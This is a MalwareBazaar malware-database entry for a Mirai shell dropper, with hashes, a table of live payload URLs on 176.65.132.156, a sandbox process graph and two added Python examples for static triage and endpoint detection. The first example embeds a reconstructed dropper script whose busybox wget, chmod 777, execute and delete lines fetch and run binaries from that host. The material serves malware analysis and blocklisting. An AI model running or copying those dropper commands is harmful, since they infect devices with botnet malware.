MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 b4ab2119d5d25a6ac85cdc11e9444c71c9115187328dac8d81e02451b5c54566. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Signature: Mirai
Vendor detections: 5

SHA256 hash: b4ab2119d5d25a6ac85cdc11e9444c71c9115187328dac8d81e02451b5c54566
SHA3-384 hash: e90fbc6bd45f2a3aaa2b6c153ac1fbbe5474b636ee32413f17e322bd46b6e335f5e1e829c3ebf270ca04ccd4cce2abae
SHA1 hash: 3b3e9e80818e12efc1f7663ae0b9fb0429310bf9
MD5 hash: 0c4fa7684c36b13ccf49a87c8ca58d33
humanhash: bacon-sixteen-mockingbird-five
File name: w.sh
Signature: Mirai
File size: 957 bytes
First seen: 2025-11-28 20:12:17 UTC
Last seen: Never
File type: sh
MIME type: text/plain
ssdeep: 24:85x7cb+c6NIpHcCKlQckBlcrELgcq5ckQcS6acgKcQlcXR:8r7cb+cBHcCUQc6lcrigcgckQcSlcgK6
TLSH: T1D21194DE02A1B23146ACDD4C3429C418A64486C266AB1E4C9C8C44F6ADD4B1BF916F8A
Magika: txt
Reporter: abuse_ch
Tags: sh
URLs observed in this sample (all payloads are served from the same open directory on 176.65.132.156):

URL                                Malware sample (SHA256 hash)                                      Signature  Tags
http://176.65.132.156/bins/parm    bd8ccc0b43135c2a27009eff3c6021a76f035eaa78a21adf36fbc4703a9798f0  Mirai      mirai opendir
http://176.65.132.156/bins/parm5   c235716871260e982f4c1cd422644ae1dc3c3339c6021a60d31757987e18bc84  Mirai      mirai opendir
http://176.65.132.156/bins/parm6   bca096353181b61d7a8f360e5128661e102128870a3c8da4228a2d917333396d  Mirai      mirai opendir
http://176.65.132.156/bins/parm7   3fc6fa5f93e1fa38af21c1005c1f082b738c879c293a27fe79944fbd156438cc  Mirai      mirai opendir
http://176.65.132.156/bins/psh4    f40265e26ef64933ff5826b3ba49c5b73f58dd4a100268f8ba88081cd14bdb75  Mirai      mirai opendir
http://176.65.132.156/bins/parc    n/a                                                               n/a        elf ua-wget
http://176.65.132.156/bins/pmips   b4ed8126ad1c0844485ad4dc05046d4befa6a9c9e57dae386c03add105883496  Mirai      mirai opendir
http://176.65.132.156/bins/pmpsl   9e1380153a681f7bcd2e8ed4d41f726ac8511ac37fb5f8f3cd510b81d0ae2957  Mirai      mirai opendir
http://176.65.132.156/bins/pppc    8df9768079b1437a33e2007fa29d5602885ba8b655e0bf1a1f04ab0122d1e09d  Mirai      mirai opendir
http://176.65.132.156/bins/px86    4792959c77de8cf52953ccccdd80c1a53e54ce7009ede67e613a98989ea4045b  Mirai      mirai opendir
http://176.65.132.156/bins/pspc    4739baeaabcb76449c853ed0bbdea48f26f143f4238c83ea818e01327fe5b460  Mirai      mirai opendir
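Added example, not code from MalwareBazaar or from the sample: a static triage routine for shell droppers of this kind. The script body it runs on is constructed to mirror the behaviour the sandbox recorded for w.sh (busybox wget of per-architecture payloads from the /bins/ open directory above, chmod, execute, delete) and is not the actual contents of the sample; the regular expressions, the architecture token list and the scoring thresholds are my own assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed input: written to mirror the recorded behaviour (fetch from
# 176.65.132.156/bins/, chmod, execute, delete). NOT the real contents of w.sh.
SAMPLE_SCRIPT = r"""#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
/bin/busybox wget http://176.65.132.156/bins/parm -O parm; chmod 777 parm; ./parm; rm -rf parm
/bin/busybox wget http://176.65.132.156/bins/parm5 -O parm5; chmod 777 parm5; ./parm5; rm -rf parm5
/bin/busybox wget http://176.65.132.156/bins/pmips -O pmips; chmod 777 pmips; ./pmips; rm -rf pmips
/bin/busybox wget http://176.65.132.156/bins/px86 -O px86; chmod 777 px86; ./px86; rm -rf px86
rm -rf w.sh
"""

URL_RE = re.compile(r"""(?:https?|tftp|ftp)://[^\s;|&<>"']+""")
FETCH_RE = re.compile(r'\b(?:busybox\s+)?(?:wget|curl|tftp|ftpget)\b')
CHMOD_RE = re.compile(r'\bchmod\s+(?:\+x|[0-7]{3,4})\b')
EXEC_RE = re.compile(r'(?:^|[;&|]\s*)\./[\w.\-]+', re.M)   # "./payload" after a separator
DELETE_RE = re.compile(r'\brm\s+-(?:rf|fr|f)\b')

# Architecture tokens as they commonly appear in Mirai payload names (assumption);
# longest first so "arm5" wins over "arm" and "x86_64" over "x86".
ARCH_TOKENS = ("x86_64", "mpsl", "mips", "arm7", "arm6", "arm5", "arm", "ppc",
               "x86", "sh4", "spc", "arc", "m68k", "i686")


def guess_arch(filename):
    """Map a payload name such as 'parm5' or 'px86' to an architecture token."""
    name = filename.lower()
    for tok in ARCH_TOKENS:
        if tok in name:
            return tok
    return "unknown"


def extract_urls(script):
    """Download URLs in order of first appearance, de-duplicated."""
    seen, urls = set(), []
    for u in URL_RE.findall(script):
        u = u.rstrip(".,)")
        if u not in seen:
            seen.add(u)
            urls.append(u)
    return urls


def triage(script):
    """Static triage of a suspected IoT dropper script.

    Returns the hosts contacted, the payload URLs with their likely target
    architecture, which dropper behaviours are present, and a coarse verdict.
    """
    urls = extract_urls(script)
    hosts = sorted({h for h in (urlparse(u).hostname for u in urls) if h})
    payloads = []
    for u in urls:
        name = u.rstrip("/").rsplit("/", 1)[-1]
        payloads.append({"url": u, "file": name, "arch": guess_arch(name)})
    indicators = {
        "fetch": bool(FETCH_RE.search(script)),    # downloads something
        "chmod": bool(CHMOD_RE.search(script)),    # makes it executable
        "exec": bool(EXEC_RE.search(script)),      # runs it from the cwd
        "delete": bool(DELETE_RE.search(script)),  # cleans up after itself
    }
    score = sum(indicators.values())
    multi_arch = len({p["arch"] for p in payloads}) > 1
    if score >= 3 and multi_arch:
        verdict = "likely multi-arch dropper"
    elif score >= 2:
        verdict = "suspicious"
    else:
        verdict = "benign-looking"
    return {"hosts": hosts, "payloads": payloads, "indicators": indicators,
            "score": score, "multi_arch": multi_arch, "verdict": verdict}


def ioc_lines(result):
    """One line per host and per payload URL, ready for an egress blocklist."""
    lines = ["host " + h for h in result["hosts"]]
    lines += ["url %s (%s)" % (p["url"], p["arch"]) for p in result["payloads"]]
    return lines


if __name__ == "__main__":
    r = triage(SAMPLE_SCRIPT)
    print(r["verdict"], r["indicators"])
    print("\n".join(ioc_lines(r)))
```

The fetch/chmod/exec/delete quartet is the whole of what a Mirai loader script does, so it is a better static signal than any single URL; the host and URL list is what you feed to the blocklist, and the architecture column tells you which of the /bins/ payloads to pull for further analysis.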

Intelligence


File Origin
# of uploads: 1
# of downloads: 28
Origin country: DE
Vendor Threat Intelligence
Verdict: Suspicious
Threat level: 5/10
Confidence: 100%
Tags: busybox mirai
Status: terminated
Behavior Graph (summarised from the sandbox process graph; the rendered graph is not reproduced here):
  /usr/bin/sudo (pid 1039) -> execve /tmp/sample.bin (pid 1042)
  /tmp/sample.bin then repeats, once per payload, the triple:
    execve /usr/bin/busybox (net, send-data, write-file) -> 86-87 B sent to 176.65.132.156:80
    execve /usr/bin/chmod
    clone /usr/bin/dash
  12 busybox fetches are recorded (pids 1044, 1054, 1066, 1078, 1093, 1104, 1116, 1131, 1147, 1160, 1173, 1184), two of them (1104, 1173) with net/send-data but no write-file, plus 12 chmod and 11 dash children.
  One fetched payload runs natively: execve /home/sandbox/px86 (pid 1170; delete-file, net)
    -> DNS lookup via 8.8.8.8:53
    -> clone /home/sandbox/px86 (pid 1172; net, send-data, zombie) -> 15 B sent to 176.65.132.156:18129
    -> clone /home/sandbox/px86 (pids 1174, 1175)
  Finally execve /usr/bin/rm (pid 1200; delete-file)
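Added example, not MalwareBazaar's or any vendor's code: turning the process graph above into detection logic that can run over endpoint telemetry. EVENTS is a hand-condensed transcription of that graph as (pid, parent pid, image, recorded actions, remote endpoint); it keeps only three of the repeated busybox/chmod/dash triples, so it is constructed input rather than the full graph. The system-directory list, the fetcher names and the set of "expected" ports are assumptions.

```python
from collections import defaultdict

SYSTEM_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/lib/", "/usr/lib/")
FETCHERS = ("busybox", "wget", "curl", "tftp", "ftpget")
SHELLS = ("dash", "sh", "bash", "ash")
EXPECTED_PORTS = {53, 80, 443}   # DNS and web; anything else from a dropped file is suspect

# Constructed from the behaviour graph: (pid, ppid, image, actions, (host, port) or None).
EVENTS = [
    (1039, 1,    "/usr/bin/sudo",      set(), None),
    (1042, 1039, "/tmp/sample.bin",    set(), None),
    (1044, 1042, "/usr/bin/busybox",   {"net", "send-data", "write-file"}, ("176.65.132.156", 80)),
    (1049, 1042, "/usr/bin/chmod",     set(), None),
    (1050, 1042, "/usr/bin/dash",      set(), None),
    (1054, 1042, "/usr/bin/busybox",   {"net", "send-data", "write-file"}, ("176.65.132.156", 80)),
    (1061, 1042, "/usr/bin/chmod",     set(), None),
    (1063, 1042, "/usr/bin/dash",      set(), None),
    (1160, 1042, "/usr/bin/busybox",   {"net", "send-data", "write-file"}, ("176.65.132.156", 80)),
    (1168, 1042, "/usr/bin/chmod",     set(), None),
    (1170, 1042, "/home/sandbox/px86", {"delete-file", "net"}, ("8.8.8.8", 53)),
    (1172, 1170, "/home/sandbox/px86", {"net", "send-data"}, ("176.65.132.156", 18129)),
    (1200, 1042, "/usr/bin/rm",        {"delete-file"}, None),
]


def basename(path):
    return path.rsplit("/", 1)[-1]


def find_dropper_chains(events):
    """Return (parent_pid, [fetch_pid, chmod_pid, exec_pid]) for every
    fetch -> chmod -> execute triple that one parent spawns, in pid order.

    A fetch is a known downloader that both used the network and wrote a file;
    an execute is either a shell (the loader trying a foreign-arch binary) or a
    process image outside the system directories (a dropped file running).
    """
    children = defaultdict(list)
    for pid, ppid, image, actions, _remote in events:
        children[ppid].append((pid, image, actions))
    chains = []
    for ppid, kids in children.items():
        kids.sort()
        state, chain = 0, []          # 0 = idle, 1 = fetched, 2 = fetched+chmod
        for pid, image, actions in kids:
            name = basename(image)
            if name in FETCHERS and {"net", "write-file"} <= actions:
                state, chain = 1, [pid]             # (re)start on every fetch
            elif state == 1 and name == "chmod":
                state, chain = 2, chain + [pid]
            elif state == 2 and (name in SHELLS or not image.startswith(SYSTEM_DIRS)):
                chains.append((ppid, chain + [pid]))
                state, chain = 0, []
    return chains


def find_beacons(events):
    """(pid, image, host, port) for processes running from outside the system
    directories that connect to a port other than DNS/HTTP/HTTPS."""
    return [(pid, image, remote[0], remote[1])
            for pid, _ppid, image, _actions, remote in events
            if remote and remote[1] not in EXPECTED_PORTS
            and not image.startswith(SYSTEM_DIRS)]


if __name__ == "__main__":
    for parent, chain in find_dropper_chains(EVENTS):
        print("dropper chain under pid", parent, "->", chain)
    for pid, image, host, port in find_beacons(EVENTS):
        print("beacon from pid", pid, image, "->", "%s:%d" % (host, port))
```

Two findings come out of this graph: the loader itself (the repeated fetch/chmod/exec under pid 1042, which is how the shell script tries each architecture until one runs) and the C2 contact by the payload that did run (px86 resolving a name via 8.8.8.8 and then sending 15 bytes to 176.65.132.156 on a non-standard port). Either rule alone fires here; together they separate the stage-one dropper from the stage-two bot.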
Threat name: Script-Shell.Downloader.Heuristic
Status: Malicious
First seen: 2025-11-28 20:13:26 UTC
File Type: Text (Shell)
AV detection: 11 of 24 (45.83%)
Threat level: 2/5

Result
Malware family: n/a
Score: 3/10
Tags: n/a
Behaviour:
  Modifies registry class
  Suspicious use of SetWindowsHookEx
  Enumerates physical storage devices
(These three behaviours are Windows-only registry and API events, so they come from a Windows analysis environment and say nothing about what a POSIX shell script does on the Linux/BusyBox targets it is written for; the busybox/mirai behaviour graph above is the relevant dynamic evidence.)
Please note that we are no longer able to provide a coverage score for Virus Total.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Web download
  Mirai
  sh b4ab2119d5d25a6ac85cdc11e9444c71c9115187328dac8d81e02451b5c54566 (this sample)

Delivery method: Distributed via web download

Comments